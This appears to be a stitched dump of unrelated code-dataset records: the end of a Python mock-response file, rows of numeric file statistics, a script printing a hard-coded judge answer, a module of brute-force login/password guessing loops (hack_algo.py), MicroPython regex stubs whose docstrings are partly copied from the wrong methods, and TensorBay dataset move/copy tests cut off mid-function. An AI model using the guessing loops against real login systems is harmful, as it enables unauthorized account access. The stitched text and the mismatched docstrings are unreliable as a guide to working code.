        {"total": 2453, "name": "2020-10-23T00:00:00Z"},
        {"total": 37, "name": "2020-11-11T00:00:00Z"}
    ]
}
# Mock response: facet search with a single bucket per facet and zero
# contacted/completed counters.
GET_FACET_SEARCH_RESULTS_RESP_1 = {
    "ranges": [
        {
            "start": "2020-10-20T00:00:00Z",
            "end": "2020-11-12T00:00:00Z",
            "bucket_size": "+1DAY",
            "field": "backend_timestamp",
            "values": [{"total": 1555, "name": "2020-10-20T00:00:00Z"}]
        }
    ],
    "terms": [
        {
            "values": [
                {"total": 797, "id": "2020-10-22T20:56:31.215Z", "name": "2020-10-22T20:56:31.215Z"}
            ],
            "field": "backend_timestamp"
        }
    ],
    "num_found": 0,
    "contacted": 0,
    "completed": 0
}
# Mock response: facet search still in progress (completed < contacted).
GET_FACET_SEARCH_RESULTS_RESP_NOT_COMPLETE = {
    "ranges": [
        {
            "start": "2020-10-20T00:00:00Z",
            "end": "2020-11-12T00:00:00Z",
            "bucket_size": "+1DAY",
            "field": "backend_timestamp",
            "values": [{"total": 1555, "name": "2020-10-20T00:00:00Z"}]
        }
    ],
    "terms": [
        {
            "values": [
                {"total": 797, "id": "2020-10-22T20:56:31.215Z", "name": "2020-10-22T20:56:31.215Z"}
            ],
            "field": "backend_timestamp"
        }
    ],
    "num_found": 0,
    "contacted": 10,
    "completed": 2
}
| 37.960432
| 203
| 0.492258
| 8,391
| 105,530
| 5.918246
| 0.076987
| 0.021023
| 0.018365
| 0.027225
| 0.911377
| 0.89563
| 0.884052
| 0.878937
| 0.873137
| 0.866935
| 0
| 0.21909
| 0.382195
| 105,530
| 2,779
| 204
| 37.974091
| 0.542602
| 0.000445
| 0
| 0.826818
| 0
| 0.000365
| 0.474426
| 0.20905
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b1046f709e441a94b7c9159b235130a44f6677f9
| 22
|
py
|
Python
|
d-series/d237.py
|
TheLurkingCat/ZeroJudge
|
6fc49c54a45e2b4b3a8d04b7a5a1fc81a2ff4eee
|
[
"MIT"
] | 1
|
2018-10-21T10:03:42.000Z
|
2018-10-21T10:03:42.000Z
|
d-series/d237.py
|
TheLurkingCat/ZeroJudge
|
6fc49c54a45e2b4b3a8d04b7a5a1fc81a2ff4eee
|
[
"MIT"
] | null | null | null |
d-series/d237.py
|
TheLurkingCat/ZeroJudge
|
6fc49c54a45e2b4b3a8d04b7a5a1fc81a2ff4eee
|
[
"MIT"
] | 2
|
2018-10-12T16:40:11.000Z
|
2021-04-05T12:05:36.000Z
|
# Emit the precomputed answer string.
# NOTE(review): value appears hard-coded for an online-judge problem - the
# program's only observable behavior is printing this exact string.
print("142913828922")
| 11
| 21
| 0.772727
| 2
| 22
| 8.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.571429
| 0.045455
| 22
| 1
| 22
| 22
| 0.238095
| 0
| 0
| 0
| 0
| 0
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
b121f2dbc05329eae13de28e625c838c544c5773
| 3,127
|
py
|
Python
|
components/hack_algo.py
|
Mesteriis/SecTool
|
8bb7f8350dba9b48f3aafb8a58a52ff44a7f8e3b
|
[
"MIT"
] | 1
|
2022-02-07T09:59:40.000Z
|
2022-02-07T09:59:40.000Z
|
components/hack_algo.py
|
Mesteriis/SecTool
|
8bb7f8350dba9b48f3aafb8a58a52ff44a7f8e3b
|
[
"MIT"
] | null | null | null |
components/hack_algo.py
|
Mesteriis/SecTool
|
8bb7f8350dba9b48f3aafb8a58a52ff44a7f8e3b
|
[
"MIT"
] | null | null | null |
def hack_n_password_for_all_logins(login_generator, password_generator, request, limit=1000):
    """Try up to ``limit`` passwords against every login the generator yields.

    :param login_generator: callable(state) -> (login, new_state); login is None when exhausted
    :param password_generator: callable(state) -> (password, new_state); password is None when exhausted
    :param request: callable(login, password) -> truthy on a successful attempt
    :param limit: maximum number of passwords tried per login
    :return: None; prints each successful (login, password) pair
    """
    lg_state = None
    while True:
        login, lg_state = login_generator(lg_state)
        if login is None:
            # All logins consumed.
            return
        # Restart the password sequence for each login.
        pw_state = None
        for _ in range(limit):
            password, pw_state = password_generator(pw_state)
            if password is None:
                print("Not found :-(")
                break
            if request(login, password):
                print('SUCCESS', login, password)
                break
def hack_n_login_for_all_passwords(login_generator, password_generator, request, limit=100):
    """Try up to ``limit`` logins against every password the generator yields.

    :param login_generator: callable(state) -> (login, new_state); login is None when exhausted
    :param password_generator: callable(state) -> (password, new_state); password is None when exhausted
    :param request: callable(login, password) -> truthy on a successful attempt
    :param limit: maximum number of logins tried per password
    :return: None; prints each successful (login, password) pair
    """
    pw_state = None
    while True:
        password, pw_state = password_generator(pw_state)
        if password is None:
            # All passwords consumed.
            return
        # Restart the login sequence for each password.
        lg_state = None
        for _ in range(limit):
            login, lg_state = login_generator(lg_state)
            if login is None:
                print("Not found :-(")
                break
            if request(login, password):
                print('SUCCESS', login, password)
                break
def hack_login_password_random(login_generator, password_generator, request, limit=10000):
    """Advance both generators in lockstep for up to ``limit`` attempts.

    Unlike the exhaustive strategies, a hit is printed but does NOT stop the
    search - only exhaustion of either generator or the attempt limit does.

    :param login_generator: callable(state) -> (login, new_state); login is None when exhausted
    :param password_generator: callable(state) -> (password, new_state); password is None when exhausted
    :param request: callable(login, password) -> truthy on a successful attempt
    :param limit: maximum number of (login, password) attempts
    :return: None; prints each successful (login, password) pair
    """
    lg_state = None
    pw_state = None
    for _ in range(limit):
        login, lg_state = login_generator(lg_state)
        password, pw_state = password_generator(pw_state)
        if login is None or password is None:
            print("Not found :-(")
            return
        if request(login, password):
            print('SUCCESS', login, password)
def hackKnowUser(login, password_generator, request, limit=10000):
    """Try up to ``limit`` generated passwords for one known login.

    As in hack_login_password_random, a hit is printed but does not stop the
    loop; only password exhaustion, a None login, or the limit ends it.

    :param login: the login string (may be None, which aborts immediately)
    :param password_generator: callable(state) -> (password, new_state); password is None when exhausted
    :param request: callable(login, password) -> truthy on a successful attempt
    :param limit: maximum number of passwords tried
    :return: None; prints each successful (login, password) pair
    """
    pw_state = None
    for _ in range(limit):
        password, pw_state = password_generator(pw_state)
        if login is None or password is None:
            print("Not found :-(")
            return
        if request(login, password):
            print('SUCCESS', login, password)
| 34.744444
| 93
| 0.644707
| 360
| 3,127
| 5.447222
| 0.152778
| 0.138705
| 0.045895
| 0.059153
| 0.854666
| 0.834778
| 0.768995
| 0.755737
| 0.736869
| 0.736869
| 0
| 0.00762
| 0.286537
| 3,127
| 90
| 94
| 34.744444
| 0.871358
| 0.299328
| 0
| 0.92
| 0
| 0
| 0.039005
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0.48
| 0
| 0
| 0.08
| 0.16
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
b13a21d0717a8a363fb866b029b537093c16ab5c
| 2,705
|
py
|
Python
|
docs/code-completion/ure.py
|
yanshanqingyuan/micropython
|
bb57a344967391d22f3430f720bcd0a5882e4a1a
|
[
"MIT"
] | null | null | null |
docs/code-completion/ure.py
|
yanshanqingyuan/micropython
|
bb57a344967391d22f3430f720bcd0a5882e4a1a
|
[
"MIT"
] | null | null | null |
docs/code-completion/ure.py
|
yanshanqingyuan/micropython
|
bb57a344967391d22f3430f720bcd0a5882e4a1a
|
[
"MIT"
] | null | null | null |
"""
ure 模块用于测试字符串的某个模式,执行正则表达式操作。
"""
DEBUG = ... # type: int
class compile(...):
    """
    - compile(regex_str[, flags])
      Compile the regular expression and return a regex object.
    """
    ...

    def __init__(self) -> None:
        ...

    def match(self, string) -> None:
        """Match string against the regex; matching always starts at the beginning of the string."""
        ...

    def search(self, string) -> None:
        """Search string for the regex. Unlike match, this searches for the first position in the string where the regex matches (the result may be position 0)."""
        ...

    def sub(self, replace, string, count, flags) -> None:
        """Compile regex_str and search for it in string, replacing all matches with replace, and returning the new string."""
        ...

    def split(self) -> None:
        """Get the buffer contents.

        NOTE(review): this docstring appears copied from an unrelated stub;
        presumably split() divides a string by the regex - confirm against
        the ure module documentation.
        """
        ...
class match(...):
    """
    - Match objects as returned by match() and search() methods.
    """
    ...

    def __init__(self) -> None:
        ...

    def group(self, index) -> None:
        """Match string against the regex; matching always starts at the beginning of the string.

        NOTE(review): docstring appears copied from compile.match; group()
        presumably returns the matched (sub)group - confirm.
        """
        ...

    def groups(self) -> None:
        """Search string for the regex. Unlike match, this searches for the first matching position (the result may be position 0).

        NOTE(review): docstring appears copied from compile.search - confirm.
        """
        ...

    def start(self, index) -> None:
        """start([index])"""
        ...

    def end(self, index) -> None:
        """end([index])
        Return the index in the original string of the start or end of the substring group that was matched. index defaults to the entire group, otherwise it will select a group.
        """
        ...

    def span(self) -> None:
        """Returns the 2-tuple (match.start(index), match.end(index))."""
        ...
class search(...):
    """
    - Match objects as returned by match() and search() methods.
    """
    ...

    def __init__(self) -> None:
        ...

    def group(self, index) -> None:
        """Match string against the regex; matching always starts at the beginning of the string.

        NOTE(review): docstring appears copied from compile.match; group()
        presumably returns the matched (sub)group - confirm.
        """
        ...

    def groups(self) -> None:
        """Search string for the regex. Unlike match, this searches for the first matching position (the result may be position 0).

        NOTE(review): docstring appears copied from compile.search - confirm.
        """
        ...

    def start(self, index) -> None:
        """start([index])"""
        ...

    def end(self, index) -> None:
        """end([index])
        Return the index in the original string of the start or end of the substring group that was matched. index defaults to the entire group, otherwise it will select a group.
        """
        ...

    def span(self) -> None:
        """Returns the 2-tuple (match.start(index), match.end(index))."""
        ...
def match(regex, string) -> None:
    """Match string against regex; matching always starts at the beginning of the string."""
    ...
def search(regex, string) -> None:
    """Search string for regex. Unlike match, this searches for the first position in the string where the regex matches (the result may be position 0)."""
    ...
def sub(regex_str, replace, string, count, flags) -> None:
    """Compile regex_str and search for it in string, replacing all matches with replace, and returning the new string."""
    ...
| 25.280374
| 178
| 0.557856
| 314
| 2,705
| 4.754777
| 0.235669
| 0.042867
| 0.052244
| 0.034829
| 0.884126
| 0.87207
| 0.87207
| 0.87207
| 0.87207
| 0.810449
| 0
| 0.003082
| 0.280222
| 2,705
| 106
| 179
| 25.518868
| 0.763739
| 0.003327
| 0
| 0.765957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b13e4b33b657131235546abadb471391e1bff83d
| 29,192
|
py
|
Python
|
tests/test_move_and_copy.py
|
Hoteryoung/tensorbay-python-sdk
|
53c34dd529c20ec69b34ddd348b5c8e74f4094d0
|
[
"MIT"
] | 2
|
2021-08-23T08:30:15.000Z
|
2021-08-30T03:18:41.000Z
|
tests/test_move_and_copy.py
|
yyy624297803/tensorbay-python-sdk
|
58cca7e16264c7ce7e3059a9dd974886b3abd917
|
[
"MIT"
] | null | null | null |
tests/test_move_and_copy.py
|
yyy624297803/tensorbay-python-sdk
|
58cca7e16264c7ce7e3059a9dd974886b3abd917
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
#
# Copyright 2021 Graviti. Licensed under MIT License.
#
import pytest
from tensorbay import GAS
from tensorbay.dataset import Data, Dataset, Frame, FusionDataset, FusionSegment, Segment
from tensorbay.exception import InternalServerError, InvalidParamsError, ResourceNotExistError
from tensorbay.label import Catalog, Label
from tensorbay.sensor import Sensor
from .utility import get_dataset_name
# BOX2D catalog fixture: fifteen zero-padded category names plus the four
# attributes used by the LABEL fixtures.
CATALOG = {
    "BOX2D": {
        # Categories "01" through "15".
        "categories": [{"name": f"{index:02d}"} for index in range(1, 16)],
        "attributes": [
            {"name": "Vertical angle", "enum": [-90, -60, -30, -15, 0, 15, 30, 60, 90]},
            {
                "name": "Horizontal angle",
                "enum": [-90, -75, -60, -45, -30, -15, 0, 15, 30, 45, 60, 75, 90],
            },
            {"name": "Serie", "enum": [1, 2]},
            {"name": "Number", "type": "integer", "minimum": 0, "maximum": 92},
        ],
    }
}
# A valid BOX2D label: every attribute value is allowed by CATALOG.
LABEL = {
    "BOX2D": [{
        "category": "01",
        "attributes": {"Vertical angle": -90, "Horizontal angle": 60, "Serie": 1, "Number": 5},
        "box2d": {"xmin": 639.85, "ymin": 175.24, "xmax": 667.59, "ymax": 200.41},
    }]
}
# Sensor fixture for fusion-segment tests: a LIDAR with fixed extrinsics.
LIDAR_DATA = {
    "name": "Lidar1",
    "type": "LIDAR",
    "extrinsics": {"translation": {"x": 1, "y": 2, "z": 3},
                   "rotation": {"w": 1.0, "x": 2.0, "y": 3.0, "z": 4.0}},
}
# An invalid BOX2D label: "Vertical angle" -75 is not among the enum values
# declared in CATALOG ([-90, -60, -30, -15, 0, 15, 30, 60, 90]).
WRONG_LABEL = {
    "BOX2D": [{
        "category": "01",
        "attributes": {"Vertical angle": -75, "Horizontal angle": 60, "Serie": 1, "Number": 5},
        "box2d": {"xmin": 639.85, "ymin": 175.24, "xmax": 667.59, "ymax": 200.41},
    }]
}
class TestMove:
    """Integration tests for moving segments and data within a TensorBay dataset.

    Each test creates a fresh remote dataset, uploads local fixture files,
    exercises one move operation/strategy, and deletes the dataset afterwards.
    """

    def test_move_segment(self, accesskey, url, tmp_path):
        """Moving a segment renames it and keeps its data, labels and paths."""
        gas_client = GAS(access_key=accesskey, url=url)
        dataset_name = get_dataset_name()
        gas_client.create_dataset(dataset_name)
        dataset = Dataset(name=dataset_name)
        segment = dataset.create_segment("Segment1")
        dataset._catalog = Catalog.loads(CATALOG)
        path = tmp_path / "sub"
        path.mkdir()
        for i in range(10):
            local_path = path / f"hello{i}.txt"
            local_path.write_text("CONTENT")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            segment.append(data)
        dataset_client = gas_client.upload_dataset(dataset)
        segment_client = dataset_client.move_segment("Segment1", "Segment2")
        assert segment_client.name == "Segment2"
        # "push" is not a valid move strategy.
        with pytest.raises(InvalidParamsError):
            dataset_client.move_segment("Segment1", "Segment3", strategy="push")
        segment2 = Segment("Segment2", client=dataset_client)
        assert segment2[0].path == "hello0.txt"
        assert segment2[0].path == segment[0].target_remote_path
        assert segment2[0].label
        gas_client.delete_dataset(dataset_name)

    def test_move_fusion_segment(self, accesskey, url, tmp_path):
        """Moving a fusion segment keeps its frames, sensor data and labels."""
        gas_client = GAS(access_key=accesskey, url=url)
        dataset_name = get_dataset_name()
        gas_client.create_dataset(dataset_name, is_fusion=True)
        dataset = FusionDataset(name=dataset_name)
        segment = dataset.create_segment("Segment1")
        segment.sensors.add(Sensor.loads(LIDAR_DATA))
        dataset._catalog = Catalog.loads(CATALOG)
        path = tmp_path / "sub"
        path.mkdir()
        for i in range(10):
            frame = Frame()
            local_path = path / f"hello{i}.txt"
            local_path.write_text("CONTENT")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            frame[LIDAR_DATA["name"]] = data
            segment.append(frame)
        dataset_client = gas_client.upload_dataset(dataset)
        segment_client = dataset_client.move_segment("Segment1", "Segment2")
        assert segment_client.name == "Segment2"
        # "push" is not a valid move strategy.
        with pytest.raises(InvalidParamsError):
            dataset_client.move_segment("Segment1", "Segment3", strategy="push")
        segment2 = FusionSegment("Segment2", client=dataset_client)
        assert segment2[0][LIDAR_DATA["name"]].path == "hello0.txt"
        assert (
            segment2[0][LIDAR_DATA["name"]].path
            == segment[0][LIDAR_DATA["name"]].target_remote_path
        )
        assert segment2[0][LIDAR_DATA["name"]].label
        gas_client.delete_dataset(dataset_name)

    def test_move_segment_abort(self, accesskey, url, tmp_path):
        """Moving onto an existing segment without a strategy raises an error."""
        gas_client = GAS(access_key=accesskey, url=url)
        dataset_name = get_dataset_name()
        gas_client.create_dataset(dataset_name)
        dataset = Dataset(name=dataset_name)
        segment1 = dataset.create_segment("Segment1")
        dataset._catalog = Catalog.loads(CATALOG)
        path = tmp_path / "sub"
        path.mkdir()
        for i in range(10):
            local_path = path / f"hello{i}.txt"
            local_path.write_text("CONTENT")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            segment1.append(data)
        segment2 = dataset.create_segment("Segment2")
        for i in range(10):
            local_path = path / f"hello{i}.txt"
            local_path.write_text("CONTENT")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            segment2.append(data)
        dataset_client = gas_client.upload_dataset(dataset)
        # Target segment already exists -> default strategy aborts server-side.
        with pytest.raises(InternalServerError):
            dataset_client.move_segment("Segment1", "Segment2")
        gas_client.delete_dataset(dataset_name)

    def test_move_segment_override(self, accesskey, url, tmp_path):
        """strategy="override" replaces the target segment with the source."""
        gas_client = GAS(access_key=accesskey, url=url)
        dataset_name = get_dataset_name()
        gas_client.create_dataset(dataset_name)
        dataset = Dataset(name=dataset_name)
        segment1 = dataset.create_segment("Segment1")
        dataset._catalog = Catalog.loads(CATALOG)
        path = tmp_path / "sub"
        path.mkdir()
        for i in range(10):
            local_path = path / f"hello{i}.txt"
            local_path.write_text("CONTENT_1")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            segment1.append(data)
        segment2 = dataset.create_segment("Segment2")
        for i in range(10, 20):
            local_path = path / f"hello{i}.txt"
            local_path.write_text("CONTENT_2")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            segment2.append(data)
        dataset_client = gas_client.upload_dataset(dataset)
        dataset_client.move_segment("Segment1", "Segment2", strategy="override")
        # The source segment is gone after the move.
        with pytest.raises(ResourceNotExistError):
            dataset_client.get_segment("Segment1")
        segment_moved = Segment("Segment2", client=dataset_client)
        assert segment_moved[0].path == "hello0.txt"
        assert segment_moved[0].path == segment1[0].target_remote_path
        # Target contents were replaced by the source files.
        assert segment_moved[0].open().read() == b"CONTENT_1"
        assert segment_moved[0].label
        gas_client.delete_dataset(dataset_name)

    def test_move_segment_skip(self, accesskey, url, tmp_path):
        """strategy="skip" keeps the existing target segment untouched."""
        gas_client = GAS(access_key=accesskey, url=url)
        dataset_name = get_dataset_name()
        gas_client.create_dataset(dataset_name)
        dataset = Dataset(name=dataset_name)
        segment1 = dataset.create_segment("Segment1")
        dataset._catalog = Catalog.loads(CATALOG)
        path = tmp_path / "sub"
        path.mkdir()
        for i in range(10):
            local_path = path / f"hello{i}.txt"
            local_path.write_text("CONTENT_1")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            segment1.append(data)
        segment2 = dataset.create_segment("Segment2")
        for i in range(10, 20):
            local_path = path / f"hello{i}.txt"
            local_path.write_text("CONTENT_2")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            segment2.append(data)
        dataset_client = gas_client.upload_dataset(dataset)
        dataset_client.move_segment("Segment1", "Segment2", strategy="skip")
        segment_moved = Segment("Segment2", client=dataset_client)
        # Target still holds its original files (hello10..hello19).
        assert segment_moved[0].path == "hello10.txt"
        assert segment_moved[0].path == segment2[0].target_remote_path
        assert segment_moved[0].open().read() == b"CONTENT_2"
        assert segment_moved[0].label
        gas_client.delete_dataset(dataset_name)

    def test_move_data(self, accesskey, url, tmp_path):
        """Renaming individual data keeps labels and leaves other files alone."""
        gas_client = GAS(access_key=accesskey, url=url)
        dataset_name = get_dataset_name()
        gas_client.create_dataset(dataset_name)
        dataset = Dataset(name=dataset_name)
        segment = dataset.create_segment("Segment1")
        dataset._catalog = Catalog.loads(CATALOG)
        path = tmp_path / "sub"
        path.mkdir()
        for i in range(10):
            local_path = path / f"hello{i}.txt"
            local_path.write_text("CONTENT")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            segment.append(data)
        dataset_client = gas_client.upload_dataset(dataset)
        segment_client = dataset_client.get_segment("Segment1")
        segment_client.move_data("hello0.txt", "goodbye0.txt")
        segment_client.move_data("hello9.txt", "goodbye1.txt")
        # with pytest.raises(InvalidParamsError):
        #     segment_client.move_data("hello1.txt", "goodbye2.txt", strategy="push")
        segment2 = Segment("Segment1", client=dataset_client)
        assert segment2[0].path == "goodbye0.txt"
        assert segment2[1].path == "goodbye1.txt"
        assert segment2[9].path == "hello8.txt"
        assert segment2[0].label
        gas_client.delete_dataset(dataset_name)

    def test_move_data_override(self, accesskey, url, tmp_path):
        """move_data with strategy="override" replaces the target file."""
        gas_client = GAS(access_key=accesskey, url=url)
        dataset_name = get_dataset_name()
        gas_client.create_dataset(dataset_name)
        dataset = Dataset(name=dataset_name)
        segment = dataset.create_segment("Segment1")
        dataset._catalog = Catalog.loads(CATALOG)
        path = tmp_path / "sub"
        path.mkdir()
        for i in range(10):
            local_path = path / f"hello{i}.txt"
            local_path.write_text(f"CONTENT_{i}")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            segment.append(data)
        dataset_client = gas_client.upload_dataset(dataset)
        segment_client = dataset_client.get_segment("Segment1")
        segment_client.move_data("hello0.txt", "hello1.txt", strategy="override")
        segment_moved = Segment("Segment1", client=dataset_client)
        for data in segment_moved:
            # hello0.txt was renamed away; hello1.txt now has hello0's content.
            assert data.path != "hello0.txt"
            assert data.label
            if data.path == "hello1.txt":
                assert data.open().read() == b"CONTENT_0"
        gas_client.delete_dataset(dataset_name)

    def test_move_data_skip(self, accesskey, url, tmp_path):
        """move_data with strategy="skip" keeps the existing target file."""
        gas_client = GAS(access_key=accesskey, url=url)
        dataset_name = get_dataset_name()
        gas_client.create_dataset(dataset_name)
        dataset = Dataset(name=dataset_name)
        segment = dataset.create_segment("Segment1")
        dataset._catalog = Catalog.loads(CATALOG)
        path = tmp_path / "sub"
        path.mkdir()
        for i in range(10):
            local_path = path / f"hello{i}.txt"
            local_path.write_text(f"CONTENT_{i}")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            segment.append(data)
        dataset_client = gas_client.upload_dataset(dataset)
        segment_client = dataset_client.get_segment("Segment1")
        segment_client.move_data("hello0.txt", "hello1.txt", strategy="skip")
        segment_moved = Segment("Segment1", client=dataset_client)
        # hello1.txt was skipped, so it keeps its original content.
        assert segment_moved[0].path == "hello1.txt"
        assert segment_moved[0].open().read() == b"CONTENT_1"
        gas_client.delete_dataset(dataset_name)
class TestCopy:
    def test_copy_segment(self, accesskey, url, tmp_path):
        """Copying a segment duplicates its data, labels and remote paths."""
        gas_client = GAS(access_key=accesskey, url=url)
        dataset_name = get_dataset_name()
        gas_client.create_dataset(dataset_name)
        dataset = Dataset(name=dataset_name)
        segment = dataset.create_segment("Segment1")
        dataset._catalog = Catalog.loads(CATALOG)
        path = tmp_path / "sub"
        path.mkdir()
        for i in range(10):
            local_path = path / f"hello{i}.txt"
            local_path.write_text("CONTENT")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            segment.append(data)
        dataset_client = gas_client.upload_dataset(dataset)
        segment_client = dataset_client.copy_segment("Segment1", "Segment2")
        assert segment_client.name == "Segment2"
        # "push" is not a valid copy strategy.
        with pytest.raises(InvalidParamsError):
            dataset_client.copy_segment("Segment1", "Segment3", strategy="push")
        segment2 = Segment("Segment2", client=dataset_client)
        assert segment2[0].path == "hello0.txt"
        assert segment2[0].path == segment[0].target_remote_path
        assert segment2[0].label
        gas_client.delete_dataset(dataset_name)
    def test_copy_fusion_segment(self, accesskey, url, tmp_path):
        """Copying a fusion segment duplicates frames, sensor data and labels."""
        gas_client = GAS(access_key=accesskey, url=url)
        dataset_name = get_dataset_name()
        gas_client.create_dataset(dataset_name, is_fusion=True)
        dataset = FusionDataset(name=dataset_name)
        segment = dataset.create_segment("Segment1")
        segment.sensors.add(Sensor.loads(LIDAR_DATA))
        dataset._catalog = Catalog.loads(CATALOG)
        path = tmp_path / "sub"
        path.mkdir()
        for i in range(10):
            frame = Frame()
            local_path = path / f"hello{i}.txt"
            local_path.write_text("CONTENT")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            frame[LIDAR_DATA["name"]] = data
            segment.append(frame)
        dataset_client = gas_client.upload_dataset(dataset)
        segment_client = dataset_client.copy_segment("Segment1", "Segment2")
        assert segment_client.name == "Segment2"
        # "push" is not a valid copy strategy.
        with pytest.raises(InvalidParamsError):
            dataset_client.copy_segment("Segment1", "Segment3", strategy="push")
        segment2 = FusionSegment("Segment2", client=dataset_client)
        assert segment2[0][LIDAR_DATA["name"]].path == "hello0.txt"
        assert (
            segment2[0][LIDAR_DATA["name"]].path
            == segment[0][LIDAR_DATA["name"]].target_remote_path
        )
        assert segment2[0][LIDAR_DATA["name"]].label
        gas_client.delete_dataset(dataset_name)
    def test_copy_fusion_segment_from_commits(self, accesskey, url, tmp_path):
        """A fusion segment can be copied from another client on a committed dataset."""
        gas_client = GAS(access_key=accesskey, url=url)
        dataset_name = get_dataset_name()
        gas_client.create_dataset(dataset_name, is_fusion=True)
        dataset = FusionDataset(name=dataset_name)
        segment = dataset.create_segment("Segment1")
        segment.sensors.add(Sensor.loads(LIDAR_DATA))
        dataset._catalog = Catalog.loads(CATALOG)
        path = tmp_path / "sub"
        path.mkdir()
        for i in range(10):
            frame = Frame()
            local_path = path / f"hello{i}.txt"
            local_path.write_text("CONTENT")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            frame[LIDAR_DATA["name"]] = data
            segment.append(frame)
        dataset_client = gas_client.upload_dataset(dataset)
        # Build commit history, then copy from a second client as the source.
        dataset_client.commit("commit_1")
        dataset_client.create_draft("draft_2")
        dataset_client.commit("commit_2")
        dataset_client.create_draft("draft_3")
        dataset_client_1 = gas_client.get_dataset(dataset_name, is_fusion=True)
        segment_client = dataset_client.copy_segment(
            "Segment1", "Segment2", source_client=dataset_client_1
        )
        assert segment_client.name == "Segment2"
        # "push" is not a valid copy strategy.
        with pytest.raises(InvalidParamsError):
            dataset_client.copy_segment("Segment1", "Segment3", strategy="push")
        segment2 = FusionSegment("Segment2", client=dataset_client)
        assert segment2[0][LIDAR_DATA["name"]].path == "hello0.txt"
        assert (
            segment2[0][LIDAR_DATA["name"]].path
            == segment[0][LIDAR_DATA["name"]].target_remote_path
        )
        assert segment2[0][LIDAR_DATA["name"]].label
        gas_client.delete_dataset(dataset_name)
    def test_copy_segment_abort(self, accesskey, url, tmp_path):
        """Copying onto an existing segment without a strategy raises an error."""
        gas_client = GAS(access_key=accesskey, url=url)
        dataset_name = get_dataset_name()
        gas_client.create_dataset(dataset_name)
        dataset = Dataset(name=dataset_name)
        segment1 = dataset.create_segment("Segment1")
        dataset._catalog = Catalog.loads(CATALOG)
        path = tmp_path / "sub"
        path.mkdir()
        for i in range(10):
            local_path = path / f"hello{i}.txt"
            local_path.write_text("CONTENT")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            segment1.append(data)
        segment2 = dataset.create_segment("Segment2")
        for i in range(10):
            local_path = path / f"hello{i}.txt"
            local_path.write_text("CONTENT")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            segment2.append(data)
        dataset_client = gas_client.upload_dataset(dataset)
        # Target segment already exists -> default strategy aborts server-side.
        with pytest.raises(InternalServerError):
            dataset_client.copy_segment("Segment1", "Segment2")
        gas_client.delete_dataset(dataset_name)
    def test_copy_segment_override(self, accesskey, url, tmp_path):
        """copy_segment with strategy="override" replaces the target segment."""
        gas_client = GAS(access_key=accesskey, url=url)
        dataset_name = get_dataset_name()
        gas_client.create_dataset(dataset_name)
        dataset = Dataset(name=dataset_name)
        segment1 = dataset.create_segment("Segment1")
        dataset._catalog = Catalog.loads(CATALOG)
        path = tmp_path / "sub"
        path.mkdir()
        for i in range(10):
            local_path = path / f"hello{i}.txt"
            local_path.write_text("CONTENT")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            segment1.append(data)
        segment2 = dataset.create_segment("Segment2")
        for i in range(10, 20):
            local_path = path / f"hello{i}.txt"
            local_path.write_text("CONTENT")
            data = Data(local_path=str(local_path))
            data.label = Label.loads(LABEL)
            segment2.append(data)
        dataset_client = gas_client.upload_dataset(dataset)
        dataset_client.copy_segment("Segment1", "Segment2", strategy="override")
        segment_copied = Segment("Segment2", client=dataset_client)
        # Target now holds the source's files (hello0..hello9).
        assert segment_copied[0].path == "hello0.txt"
        assert segment_copied[0].path == segment1[0].target_remote_path
        assert segment_copied[0].label
        gas_client.delete_dataset(dataset_name)
def test_copy_segment_skip(self, accesskey, url, tmp_path):
    """Copying onto an existing segment with strategy="skip" leaves it untouched."""
    client = GAS(access_key=accesskey, url=url)
    name = get_dataset_name()
    client.create_dataset(name)
    dataset = Dataset(name=name)
    source = dataset.create_segment("Segment1")
